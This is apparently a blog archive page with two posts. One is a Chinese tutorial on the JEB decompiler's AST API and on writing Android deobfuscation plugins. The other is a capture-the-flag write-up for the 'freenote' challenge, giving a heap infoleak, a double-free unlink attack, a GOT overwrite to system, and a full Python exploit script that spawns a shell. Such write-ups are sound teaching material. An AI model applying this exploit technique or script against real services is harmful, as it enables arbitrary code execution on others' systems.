Monthly Archives: June 2015

Advanced Android Application Analysis Series – JEB API Manual and Plugin Writing

Android应用分析进阶教程之一- 初识JEBAPI

还在对着smali和jdgui抓耳挠腮grep来grep去吗?本系列教程将围绕Soot和JEB,讲述Android应用的进阶分析,感受鸟枪换炮的快感.

JEB是Android应用静态分析的de facto standard,除去准确的反编译结果、高容错性之外,JEB提供的API也方便了我们编写插件对源文件进行处理,实施反混淆甚至一些更高级的应用分析来方便后续的人工分析.本系列文章的前几篇将对JEB的API使用进行介绍,并实战如何利用开发者留下的蛛丝马迹去反混淆.先来看看我们最终编写的这个自动化反混淆插件实例的效果:

反混淆前: before-deobfus-1 before-deobfus-2 反混淆后: after-deobfus-1

after-deobfus-2 可以看到很多类名和field名都被恢复出来了. 读者朋友肯定会好奇这是如何做到的, 那我们首先来看下JEB提供API的结构:

JEB AST API结构

JEB的AST与Java的AST稍有不同,但大体还是很相似的,只是做了些简化.所有的AST Element实现jeb.api.ast.IElement,要么继承于jeb.api.ast.NonStatement,要么继承于jeb.api.ast.Statement.他们的关系如下图所示: ast-1

IElement定义了getSubElements,但不同类型的实现和返回结果也不同,例如对Method进行getSubElements调用的返回会是函数的参数定义语句和函数体block,而IfStmt会返回判断使用的Predicate和每一个if/else/ifelse语句块.而一个Assignment语句则会返回左右IExpression操作数,以及Operator操作符.具体编写脚本中我们通常并不使用这个函数,而根据具体类型定义的更细致的函数,例如Assignment提供的getLeftgetRight.

以下面的函数为例,我们来分析它具体由哪些AST元素组成.

boolean isZtz162(Ztz ztz)
{
boolean bool = true;
Redrain redrain = Redrain.getInstance("AnAn");                 if(redrain.canShoot())
{
redrain.shoot(163);
if(ztz.isDead()) { bool = false; }
}
 else if(ztz.height + Integer.parseInt(ztz.shoe) > 162)
 { bool = false; }
 return bool;
}

首先来看下NonStatement

NonStatement

在文档中, NonStatement的描述是Base class for AST elements that do not represent Statements. ,即所有不是Statement的AST结构继承于NonStatement,如下图所示: ast-2

NonStatementExpression的区别在于,NonStatement包含了一些高阶结构,例如jeb.api.ast.Class, jeb.api.ast.Method这些并不会出现在语句中的AST结构体,他们分别代表一个Class结构和Method结构,注意不要与反射语句中使用的Class和Method混淆.

Statement

Statement顾名思义就代表了一个语句,但值得注意的是这里的语句并不代表单个语句,继承于CompoundStatement中也可能包含其他的Statement.例如下面这段代码:

if(ztz.isDead())//redundant statement to demonstrate if-else { return false; }
else{ return true; }

这事实上是一整个继承于CompoundIfStm,也就是Statement.

Statement的继承关系图如下图所示, ast-3

CompoundStatement是最基本的语句结构,它的子节点只会由Expression构成而不会包含block. 例如Assignment,可以通过getLeftgetRight调用获得左右两边的操作对象,分别为ILeftExpressionIExpression.ILeftExpression代表可以做左值的Expression,例如变量.而常量显然不实现ILeftExpression接口

Compound

Compound代表多个语句集合的语法块集合,每一个语法块以Block(也是Compound的子类)呈现,通过getBlocks调用获得.所有分支语句均继承Compound,如下图所示: ast-4

在上面提到的例子中,IfStmt就是一个Compound,我们通过getBranchPredicate(idx)获取Predict,也就是ztz.isDead()这个Expression,而这个Expression真正的类型是子类Call.我们可以通过getBranchBody(idx)获取if和if-else中的Block,通过getDefaultBlock获取else的Block

IExpression

IExpression代表了最基本的AST节点,其实现关系如下图: ast-5

IExpression接口的实现者Expression类代表了算术和逻辑运算的语句片段,例如a+b, “162” + ztz.toString(), !ztz, redrain*(ztz-162)等等,同时Predicate类是Expression类的直接子类,譬如在if(ztz162)中,该语句的Predicate左值为ztz162这个identifier,右值为null.

ztz.test(1) + ”height" + 162这个Expression为例,其结构组成和各节点类型如下: jeb-expression-chart 值得注意的有如下几点: – Expression是从右到左的结构 – Call没有提供获取caller的API,不过可以通过getSubElements()获取,返回顺序为 – callee method – calling instance (if instance call) – calling arguments, one by one

InstanceField, StaticField和Field

三者的关系如下图所示: 1434640610408

InstanceFieldStaticField包含Field. InstanceField通过getInstance调用获取一个IExpression,也就是Field的container. Field本身是Class的元素,而InstanceFieldStaticField则是它的具体实例化.

实例Method分析

以我们上面提到的isZtz162函数为例,它的AST结构如下:

  • jeb.api.ast.Method (getName() == “isZtz162”) => getBody()
    • Block => block.get(i) //遍历block中的语句
      • Assignment “boolean bool = true” => getSubElements
        • Definition “boolean bool”
          • Identifier “bool”
        • Constant “true”
      • Assignment “Redrain redrain = Redrain.getInstance(“AnAn”);” => getSubElements
        • Definition => getSubElements (注意它是父assignment的getLeft返回结果(左值))
          • Identifier “redrain”
        • Call “Redrain.getInstance(“AnAn)”” (注意它是父assignment的getRight返回结果(右值))
          • …(omit)
      • IfStmt (Compound) => getBlocks()
        • Block (if block) => block.get(i) 遍历block中的语句
          • Call “redrain.shoot(163);”
          • IfStmt (Compound)
            • …omit
        • Block (elseif block) => block.get(i) 遍历block中的语句
          • Assignment “bool = false'”
          • ..omit

可以通过如下代码来递归打印一个Method中的各个Element: class test(IScript):

def run(self, j):
    self.instance = j
    sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
    currentMethod = self.instance.getDecompiledMethodTree(sig)
    self.instance.print("scanning method: " + currentMethod.getSignature())
    body = currentMethod.getBody()
    self.instance.print(repr(body))
    for i in range(body.size()):
        self.viewElement(body.get(i),1)
def viewElement(self, element, depth):
    self.instance.print("    "*depth+repr(element))
    for sub in element.getSubElements():
        self.viewElement(sub, depth+1)

输出结果如下:

jeb.api.ast.Block@5909b311
    jeb.api.ast.Assignment@bcb4ec2
    jeb.api.ast.Definition@66afd874
        jeb.api.ast.Identifier@38ffa6bd
    jeb.api.ast.Constant@181bdf87
    jeb.api.ast.Assignment@4df0246e
    jeb.api.ast.Definition@50e7d9bb
        jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Call@6e8ebb23
        jeb.api.ast.Method@5ca02f89
            jeb.api.ast.Definition@1890fae1
                jeb.api.ast.Identifier@5646d660
            jeb.api.ast.Block@44a464e0
        jeb.api.ast.Constant@4dad155
    jeb.api.ast.IfStm@298ea172
    jeb.api.ast.Predicate@530958ae
        jeb.api.ast.Call@a9d3219
            jeb.api.ast.Method@56440cc0
                jeb.api.ast.Definition@da13d7f
                    jeb.api.ast.Identifier@54cc63d6
                jeb.api.ast.Block@36aea218
            jeb.api.ast.Identifier@2587ad7c
    jeb.api.ast.Predicate@313f1b4
        jeb.api.ast.Expression@12616200
            jeb.api.ast.InstanceField@3768f76d
                jeb.api.ast.Identifier@4c4c3186
                jeb.api.ast.Field@198ed96b
            jeb.api.ast.Call@71640ce8
                jeb.api.ast.Method@5f8b8d80
                jeb.api.ast.InstanceField@42f6ff81
                    jeb.api.ast.Identifier@4c4c3186
                    jeb.api.ast.Field@6600907f
        jeb.api.ast.Constant@2f0eb62a
    jeb.api.ast.Block@6ed99788
        jeb.api.ast.Call@f6b9a93
            jeb.api.ast.Method@617130cd
                jeb.api.ast.Definition@4e3b14b5
                    jeb.api.ast.Identifier@8cc9f33
                jeb.api.ast.Definition@31e7d1c8
                    jeb.api.ast.Identifier@6a7dbb10
                jeb.api.ast.Block@64844e0e
            jeb.api.ast.Identifier@2587ad7c
            jeb.api.ast.Constant@2a20acb0
        jeb.api.ast.IfStm@47296c6b
            jeb.api.ast.Predicate@708d094c
                jeb.api.ast.Call@3b5d964e
                    jeb.api.ast.Method@7d36f954
                        jeb.api.ast.Definition@242b3a05
                            jeb.api.ast.Identifier@11ee30d0
                        jeb.api.ast.Block@2cc6b0e2
                    jeb.api.ast.Identifier@4c4c3186
            jeb.api.ast.Block@2886dc65
                jeb.api.ast.Assignment@2def7fac
                    jeb.api.ast.Identifier@38ffa6bd
                    jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Block@136fa72
        jeb.api.ast.Assignment@407452fd
            jeb.api.ast.Identifier@38ffa6bd
            jeb.api.ast.Constant@46a70cc3
    jeb.api.ast.Return@14f4811a
    jeb.api.ast.Identifier@38ffa6bd

对AST结构的分析就到这里,本文选取了几种最典型的做了讲解.此外JEB还提供了jeb.api.dex,提供了对dex文件的操作API.由于这方面资料比较多,这里就先不赘述了.

实例分析之开发环境配置

JEB原生支持Java和Python两种语言进行开发,后者的支持是通过Jython实现的.这里简便起见我们的例子均以Python为例.个人建议想使用前者的话最好使用Scala,否则Java本身实在太罗嗦了.

Java

在eclipse中配置好classpath中的library指向bin/jeb.jar,同时将javadoc路径指向jeb/doc/apidoc.zip即可.

1434639993696

1434639954618

1434639823928

1434639770823

Python

Python环境配置相对麻烦点,因为JEB并没有提供相对应的skeleton,导致Python的IDE中默认没有代码补全,需要自行配置.笔者使用了PyCharm的JythonHelper插件,可以帮助生成skeleton从而有基本的代码补全.

配置好环境后,我们来编写一个最简单的插件:输出光标所在位置的method signature,代码如下所示:

from jeb.api import IScript
from jeb.api.ui import View
class test(IScript):
    def run(self, j):
        self.instance = j
        sig = self.instance.getUI().getView(View.Type.JAVA).getCodePosition().getSignature()
        currentMethod = self.instance.getDecompiledMethodTree(sig)
        self.instance.print("scanning method: " + currentMethod.getSignature())

保存为test.py,点击File->Run Script->test.py, JEB就会在下面的console中输出当前光标所在函数的signature.

总结

本文介绍了JEB Java AST API的基本知识和插件编写入门,同时也可以作为一个APIDoc的补充参考.在下一篇文章中我们将会根据实例讲解如何编写高级的更复杂的插件. 源代码和测试样例在https://github.com/flankerhqd/jebPlugins可以找到。

freenote – advanced heap exploitation

Author: Flanker

Abstract

Freenote is a binary with infoleak and double free vulnerabilities and is a good practice for heap exploitation. The first vulnerability is when a note is deleted, its content isn’t zeroed and when another note is allocated at the very same location, the content of last allocation is still there. The second vulnerability is when freeing note the program does not check if the current note is actually already freed, causing a double free.

Introduction

There are two data structures used in freenote, one we name it “NoteBook” and the other “Note”. Note book can be mapped to the following structure:

struct Notebook {
    int tot_cnt;
    int use_cnt;
    Note notes[256];
}
struct Note {
    int in_use;
    int content_length;
    char* content;
}

There are four operations available: list, delete, new, edit. Delete operation simply set the in_use field to zero and call free on the Note ptr, however it doesn’t check whether this note is already freed before (in_use field is already zero). Edit option checks if the new input lenght is equal to original one. If not, it will call realloc and then write new content into the origin note. New option mallocs a (len//0x80 + 1)*0x80 chunk and writes user input, notice no zmalloc or memeset zero is called. Thus lead to the first vulnerability – infoleak.

Heap baseaddress InfoLeak

As we stated before, neither new note or delete note operations zero outs memory. Recall the chunk struct of glibc malloc:

struct malloc_chunk {
    INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
    INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */
    struct malloc_chunk* fd; /* double links -- used only if free. */
    struct malloc_chunk* bk; /* double links -- used only if free. */
    struct malloc_chunk* fd_nextsize; /* Only used for large blocks: pointer to next larger size. */
    struct malloc_chunk* bk_nextsize; /* Only used for large blocks: pointer to next larger size. */
 };

And also, list note use %s format string to output note content, so we can free two non-adjacent note. This will make the first 16 bytes (for 64bit-arch or 8bytes for 32bit-arch) after size field, which is originally the “data”/”content” of in use note. Then we can new a note again, because freed chunk in bin list tend to be reused first, we will actually get the originally freed note. And write sizeof(malloc_chunk*) char into the note, call list note and we will get the bk pointer value.

We cannot just free one note and call new note on it because when there is only one free chunk, this chunk’s fd and bk will point to glibc global struct but not chunk on the heap. We need the heap address to bypass ASLR to exploit the next double-free vulnerability.

So steps are: – New four notes, 0,1,2,3 – Delete 0,2 – New note again, this time note 0’s chunk is reused, write 4bytes(32bit arch)/8bytes(64bit arch) – List note, get note2’s address, substract offset to get base heap address.

After 0 is freed:

gdb-peda$ x/100xg 0x604820
0x604820:    0x0000000000000000    0x0000000000000091
0x604830:    0x00007ffff7dd37b8    0x00007ffff7dd37b8
gdb-peda$ p main_arena
$3 = {
  mutex = 0x0,
  flags = 0x1,
  fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
  top = 0x604a60,
  last_remainder = 0x0,
  bins = {0x604820, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Notice currently chunk Note0 does not contain pointer to address on heap.

After 2 is freed:

(after free 2)
0x604820:    0x0000000000000000    0x0000000000000091(note 0 chunk)
0x604830:    0x00007ffff7dd37b8    0x0000000000604940(point to note2 free chunk)
0x604840:    0x0000000000000000    0x0000000000000000
0x604850:    0x0000000000000000    0x0000000000000000
0x604860:    0x0000000000000000    0x0000000000000000
0x604870:    0x0000000000000000    0x0000000000000000
0x604880:    0x0000000000000000    0x0000000000000000
0x604890:    0x0000000000000000    0x0000000000000000
0x6048a0:    0x0000000000000000    0x0000000000000000
0x6048b0:    0x0000000000000090    0x0000000000000090(note 1 chunk)
0x6048c0:    0x0000000062626262    0x0000000000000000
0x6048d0:    0x0000000000000000    0x0000000000000000
0x6048e0:    0x0000000000000000    0x0000000000000000
0x6048f0:    0x0000000000000000    0x0000000000000000
0x604900:    0x0000000000000000    0x0000000000000000
0x604910:    0x0000000000000000    0x0000000000000000
0x604920:    0x0000000000000000    0x0000000000000000
0x604930:    0x0000000000000000    0x0000000000000000
0x604940:    0x0000000000000000    0x0000000000000091(note 2 chunk)
0x604950:    0x0000000000604820    0x00007ffff7dd37b8(point back to note0 free chunk)
0x604960:    0x0000000000000000    0x0000000000000000
gdb-peda$ p main_arena
$4 = {
mutex = 0x0,
flags = 0x1,
fastbinsY = {0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0},
top = 0x604a60,
last_remainder = 0x0,
bins = {0x604940, 0x604820, 0x7ffff7dd37c8, 0x7ffff7dd37c8, 0x7ffff7dd37d8, 0x7ffff7dd37d8,

Double free

As note can be freed twice, we can use the unlink primitive to do a arbitrary write. But how do we bypass the glibc unlink FD->BK == P && BK->FD == P check? We will use 64bit arch in the following content of this article.

Remember there is also a pointer point to the note chunk in notes array, we call it “content”. A fake chunk with *(FD+3) == P == content and *(BK+2) == P == content will pass glibc’s check, thus make *P = P-3.

Free use prev_size to decide previous chunk’s address if prev_inuse (size&1) is false. If dlmalloc finds out previous chunk is free when freeing current chunk, it will do an unlink on previous chunk to remove it off freelist and merge with current chunk.

So we have a sckeleton idea, – Alloc 0,1,2, place fake chunk at 0 – Free 1,2 – Alloc 3 covering 1,2, so that we can construct a fake chunk in the original location of 2 – Call free on 2 again

What’s worthing noticing is that dlmalloc decides if current block is in use by checking next adjacent chunk’s in_use flag. So to make double free on 2 succeed, we need append two more fake chunks, and set them as in use. This is because:

For the following chunks (assume all valid chunks): | 1 | 2 | 3 | 4 | 5 |

When freeing 3, dlmalloc will check if 2 is in use using 3’s PREV_INUSE flag, and check if 4 is in use using 5’s PREV_INUSE flag. 5’s address is decided using 3’size + 3’address + 4’size. So when we make fake chunk 3, we must also append two “valid” fake inuse chunks after 3, to avoid SIGSEGV.

READ LIBC ADDRESS

As we successfully perform a write, the memory layout of NoteBook struct, which is at the beginning of heap, becomes

gdb-peda$ x/40xg 0x11af000
0x11af000:    0x0000000000000000    0x0000000000001821
0x11af010:    0x0000000000000100    0x0000000000000002
0x11af020:    0x0000000000000001    0x0000000000000020
0x11af030:    0x00000000011af018    0x0000000000000001

Notice *P has becomes P-3, so by editing note we can overwrite P, pointing it to free@got or whatever convenient. When constructing note payload, notice the payload length should be equal to original one (0x20), or realloc will be called and our fake chunk will not pass realloc check. For the following note edit’s convenience (we’re writing a 8byte address to note 0, we can modify note0’s length as 8 here).

Then perform a note list to read free@got’s content, i.e. free’s address. Using this address we’re able to get system’s address. Then a write (note edit) is performed on note 0, remember we’ve already modified note0’s length to 8, thus avoiding realloc.

EXECUTE CODE

We choose to rewrite free@got because we can control its argument, e.g. freeing a note whose content is under our control like “/bin/sh”. So we can new a note with content “/bin/sh\x00”, then call rewrited free (now system) will give us a shell.

Example code (64bit and 32bit)

64bit:

from zio import *
import time
#io = zio('./freenote1')
io = zio(("xxxx",10001))
def new_note(content):
    io.read_until("choice: ")
    io.writeline("2")
    io.read_until("new note: ")
    io.writeline(str(len(content)))
    io.read_until("note: ")
    io.writeline(content)
    io.read_until("choice: ")
def free_note(nid):
    io.read_until("choice: ")
    io.writeline("4")
    io.read_until("number: ")
    io.writeline(str(nid))
def read_note(nid):
    io.read_until("Your choice: ")
    io.writeline("1")
    notes = io.read_until("== 0ops Free Note ==")
        if notes.find("Invalid") != -1:
            io.read_until("Your choice: ")
            notes = io.read_until("== 0ops Free Note ==")
    for note in notes.split('\n'):
        if note[0] == str(nid):
            return note.split("%d. "%nid)[1]
    return ""
def mod_note(nid, content):
        io.read_until("Your choice: ")
        io.writeline("3")
        io.read_until("Note number: ")
        io.writeline(str(nid))
        io.read_until("Length of note: ")
        io.writeline(str(len(content)))
    io.read_until("Enter your note: ")
        io.writeline(content)
        io.read_until("choice: ")
new_note("aaaa")
new_note("bbbb")
new_note("cccc")
new_note("dddd")
free_note(0)
free_note(2)
new_note("abcdabcd")
#free block 0 and 2
out = read_note(0)
base_addr = l64(out[8:].ljust(8,"\x00")) - 144*2 - (0x604820 - 0x603000)
prev_size_offset = 144*2 + 128
#note addr begins at 0x603010
FAKE_PREV_SIZE = 0x0
FAKE_SIZE = prev_size_offset + 1
FAKE_FD_ADDR = base_addr + 0x18 #*(FD+4) = P
FAKE_BK_ADDR = base_addr + 0x20 #*(BK+3) = P
#free all notes, 0,1,2,3
free_note(0)
free_note(1)
free_note(3)
new_note(l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + l64(FAKE_FD_ADDR) + l64(FAKE_BK_ADDR))
new_note("/bin/sh\x00")
FAKE_PREV_SIZE = prev_size_offset
FAKE_SIZE = 0x90
#alloc chunk at (2,3)
new_note('a'*128 + l64(FAKE_PREV_SIZE) + l64(FAKE_SIZE) + 128*'a' + (l64(0) + l64(0x91) + 128*'a')*2)
free_note(3)
#alloc note0 with fake chunk
#now free block 1, then alloc block4 at block(1,2)
#fake chunk 2 should have prev_size points to chunk 0 data area
'''
|PREV_SIZE|SIZE|{PREV_SIZE}|{SIZE}|{DATA}|PREV_SIZE|SIZE|DATA
'''
'''
now *p = p-3, modify note 1 to free@got
'''
mod_note(0, l64(0x2) + l64(0x1) + l64(0x8) + l64(0x602018))
free_addr = l64(read_note(0).ljust(8, "\x00"))
system_addr = free_addr - (0x76C60 - 0x40190)#libc at pwn server
#system_addr = free_addr - (0x82df0 - 0x46640)
mod_note(0, l64(system_addr))
free_note(1)
io.interact()